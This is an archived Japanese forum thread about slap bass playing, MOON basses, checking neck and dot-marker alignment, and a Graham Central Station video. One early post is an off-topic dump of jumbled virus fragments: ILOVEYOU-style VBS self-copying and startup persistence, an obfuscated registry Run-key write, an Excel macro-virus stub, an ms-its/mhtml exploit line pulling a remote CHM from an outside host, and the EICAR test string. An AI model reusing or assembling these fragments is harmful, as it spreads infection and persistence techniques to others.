129 :ドレミファ名無シド:2006/07/27(木) 00:10:23 ID:UgurgpWV
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???


130 :ドレミファ名無シド:2006/07/27(木) 11:46:11 ID:XR8cvbFZ
MOON(JJ,JB)でスラップしてる人に聞きますが、
デフォで弦高下げるとテンション感が無さ過ぎで弾きにくくないですか?
自分はネックポケットにシム挟んで丁度いいくらいです。
テンション感の調整って自分でやります?

MOONスレ落ちたので便乗質問ですが、
MOONの5弦ベースは3弦とドットマークのセンターが他メーカーより
結構ズレてる(ゲージが違うから当たり前だが同ピッチでズレてない機種もある)

3ポジション
http://bassfaq.hp.infoseek.co.jp/cgi-bin/img-box/img20060727113639.jpg

19ポジション
http://bassfaq.hp.infoseek.co.jp/cgi-bin/img-box/img20060727113722.jpg

3と19でズレ量が違うので知らないうちに倒されたりして狂ったのかも?心配



131 :ドレミファ名無シド:2006/07/27(木) 12:03:43 ID:3WK9MnDi
センターズレの簡易チェックは、5弦ベースだと3弦を指で押して3フレットのポジションマークの
センターになるようにします。その状態で最終フレット付近のポジションマークのセンターにはいって
いればオーケー。
ずれていたらネックジョイントがずれているか、ブリッジの取り付けがおかしい。
物によってはポジションマークをセンターにいれてない物もある(製造工程でそこの部分の精度をあまり厳しく
してない)ので定規などでチェックしておくといいです。

132 :ドレミファ名無シド:2006/07/27(木) 12:43:08 ID:XR8cvbFZ
>131
ありがとう!
その方法で気持ちズレてたから引っ叩いたら直ったw
シム挟む時にズレたんだと思う。




133 :(・ω・)ノ ウマー:2006/07/27(木) 20:01:36 ID:uQ9wcAdG
Graham Central Station - Pow

http://www.youtube.com/watch?v=Z1IuD6F3R5I&search=Graham

134 :ドレミファ名無シド:2006/07/27(木) 21:46:58 ID:+O/zl0RE
>>132
画像見るかぎり正常だよ。
ナットはメーカによって違うけど、弦のセンターで切るとこと、弦間で切るところがある。
センターだと大体ポジマの真上にくる。
弦間だと上の画像のようになる。

135 :ドレミファ名無シド:2006/07/27(木) 23:16:09 ID:JG9s2++v
>>133
グラハムかっけなぁー

136 :ドレミファ名無シド:2006/07/27(木) 23:47:40 ID:JXc+dVaP
>>133
撃たれた

137 :ドレミファ名無シド:2006/07/28(金) 00:32:48 ID:IEMlJtDT
とりあえずみんなでパウ合戦しようぜ

138 :ドレミファ名無シド:2006/07/28(金) 00:35:12 ID:kox9zAY3
PBでスラップしてる人って誰がいますか?

139 :ドレミファ名無シド:2006/07/28(金) 00:45:04 ID:JgvAj0co
>>137
またかよw
そういえばPOWの桶の人まだ忙しいのかな?続き欲しいw

140 :ドレミファ名無シド:2006/07/28(金) 01:38:45 ID:8jCP/wcK
ここに桶たくさんあるよ。
http://pixku.notlong.com

141 :ドレミファ名無シド:2006/07/28(金) 02:00:33 ID:4p6gftCR
正直、グラハム名前ぐらいしか知らないでスラップスラップ言ってたけど、反省する・・・
あんなスラップしながら歌ってるって信じられない・・・

142 :ドレミファ名無シド:2006/07/28(金) 03:46:01 ID:6zxLbRMV
自分の世代からするとあの髪型の方が信じられません・・

143 :ドレミファ名無シド:2006/07/28(金) 07:21:32 ID:2WkxgiRv
スラップはファンキーさが命

144 :ドレミファ名無シド:2006/07/28(金) 13:01:53 ID:Sjv0ezfz
>>141
別に反省する必要は無いと思うがw
念のためだが、>>133は当てフリの口パクだからね

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)